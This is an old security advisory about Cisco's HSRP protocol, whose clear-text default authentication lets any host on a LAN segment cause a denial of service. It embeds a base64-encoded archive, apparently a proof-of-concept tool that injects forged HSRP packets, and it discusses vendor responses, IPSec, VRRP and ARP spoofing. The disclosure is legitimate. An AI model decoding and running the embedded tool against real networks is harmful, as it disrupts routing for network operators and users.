Vulnerability
Cisco
Affected
Cisco HSRP
Description
'bashis' found following. He was playing with Cisco's HSRP (Hot
Standby Routing Protocol), and there is a (major) weakness in that
protocol that allow any host in a LAN segment to make a HSRP DoS.
Short (very) explain of HSRP. HSRP uses UDP on port 1985 to
multicast address 224.0.0.2, and the authentication is in clear
text. (default: cisco)
Included is a small program that sends out a fake HSRP packet,
when it hear a legal HSRP packet, as a "proof of concept" code...
---
Content-Type: application/octet-stream; name="hsrp-dos.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="hsrp-dos.tgz"
Content-MD5: nKbYhzRWPSLBJSU+KUUegg==
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
-----
- this vulnerability can be exploited only from the local segment
(not over the Internet),
- the same effect, denial of service, can be produced by using
ARP, which can not be protected in any way
The last issue is especially important since it may cause a false
sense of security if user is using a hardened version the protocol
(whichever protocol). Even by using VRRP and ESP+AH option, an
attacker can still disrupt the network by using ARP.
Solution
Vendor was notified about this 14 April 2001, and their response
was to use HSRP with IPSec.
Their response was precisely correct. Given the evils that can
be done with ARP-spoofing, this sort of misbehavior by someone
already on the LAN can't easily be prevented. More generally,
have a look at RFC 2338, on VRRP -- the Virtual Router Redundancy
Protocol. VRRP is the standards-track replacement for HSRP. The
Security Considerations section explains when to use each type of
authentication, up to and including IPsec.
Cisco's real mistake is in having a common default authentication
word -- not because it's a security failure, but because it can
no longer fulfill its function of guarding against configuration
errors.
It's realy old news, this was allready known in '98 when they
written RFC 2281 but nobody have talked about it in public,
except Cisco who is saying how good it is, to get a fault tolerant
network..
Cisco can confirm that described vulnerability is present in the
HSRP and, at the present time, there is no workaround for it.
Cisco is deliberating usage of IP authenticated header for HSRP
and VRRP (Virtual Router Redundancy Protocol, RFC2338) in the
future releases of IOS.